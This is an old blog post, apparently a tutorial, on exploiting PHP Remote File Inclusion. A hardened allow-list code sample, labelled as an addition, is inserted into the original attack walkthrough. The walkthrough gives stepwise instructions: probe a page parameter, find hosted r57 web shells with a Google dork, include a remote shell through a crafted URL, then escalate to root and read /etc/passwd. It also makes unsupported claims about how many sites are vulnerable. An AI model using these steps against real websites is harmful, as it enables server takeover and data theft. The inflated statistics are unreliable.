Thursday, February 17, 2011

Remote File Inclusion:

Remote File Inclusion, or RFI, occurs when an attacker gets the website to include a remote file containing a shell. This lets the attacker execute commands on the server as the web-server user and browse all of the server's files.
Almost 70 % of websites are vulnerable to this kind of attack.
The reason this attack is possible is that PHP's default settings have register_globals and allow_url_fopen enabled.
All websites running PHP 5.0 or less are vulnerable to this kind of attack.
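The pattern behind this is a page router that passes a request parameter straight to include(). The following is an added example, not code from the original post: the vulnerable form beside a hardened version that maps the parameter onto a fixed allow-list of local files. The parameter name `page`, the `pages/` directory and the file names are assumed for illustration.

```php
<?php
// Added example (not from the original post). The parameter name "page" and
// the files under pages/ are assumed for illustration.

// --- Vulnerable form: the request value is handed directly to include().
// With allow_url_fopen (and, on PHP >= 5.2, allow_url_include) enabled,
// a value such as "http://host/shell.txt" makes PHP fetch and execute
// a remote file instead of a local page.
function render_page_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    include $page . '.php';
}

// --- Hardened form: look the request value up in an allow-list keyed by
// exact page name. No user-controlled string ever reaches include().
const PAGE_MAP = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the local path for a known page name, or null for anything else
// (a URL, an absolute path, "../" sequences: none of these match a key).
function resolve_page(?string $requested): ?string
{
    if ($requested === null) {
        return PAGE_MAP['home'];
    }
    return PAGE_MAP[$requested] ?? null;
}

function render_page_hardened(array $get): void
{
    $target = resolve_page($get['page'] ?? null);
    if ($target === null) {
        // Log the rejected value: repeated URL-shaped values for this
        // parameter are a useful detection signal for RFI probing.
        error_log('rejected page parameter: ' . ($get['page'] ?? ''));
        http_response_code(404);
        echo 'Not found';
        return;
    }
    include $target;
}

// Defence in depth belongs in php.ini as well, so application code is not
// the only barrier:
//   allow_url_include = Off   ; refuses remote include()/require() outright
//   allow_url_fopen   = Off   ; unless the application genuinely needs URL streams
//   register_globals  = Off   ; (the setting was removed entirely in PHP 5.4)

render_page_hardened($_GET);
```

With this in place, `resolve_page('about')` yields the local file path, while `resolve_page('http://www.shellsite.com/r57.txt?')` and `resolve_page('../../etc/passwd')` both yield null and produce a 404, so the remote-inclusion test described later in the post (redirecting the page parameter to an external site) no longer works against the router.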

Ok, I will not bore you any further; now I will show you how this kind of attack is performed.

Step 1. Let's choose a target (here I am taking the target as www.target.com).

Step 2. To find out whether www.target.com is vulnerable to RFI, we look at its URL structure.
Generally, websites vulnerable to RFI have a structure like:
http://www.target.com/index.php?page=Pageno
Let's assume the target has this structure. We then try to redirect the page parameter to Google; if Google's homepage shows up, www.target.com is vulnerable to RFI.
So the finished URL would be: http://www.target.com/index.php?page=http://www.google.com

Step 3. Now that we know target.com is vulnerable to RFI, we will try to include a shell into the website.

Step 4. Here I will include the r57 shell. To search for an already uploaded shell, we search Google for inurl:r57.txt; this gives us websites on which the shell is hosted.

Step 5. So the final URL would be:
http://www.target.com/index.php?page=http://www.shellsite.com/r57.txt?
I have included a trailing ? because anything after the ? is passed to the shell as a query string and does not cause a problem.

Step 6. If the attack succeeds, we will see a screen similar to the following:

This is the shell, and it displays all the files on the server.

Step 7. Now we will try to get root access on the target machine by running a local exploit against it.

Step 8. We can also search for password files, which are in /etc/passwd.
Also visit www.divyaranjan.com for more articles
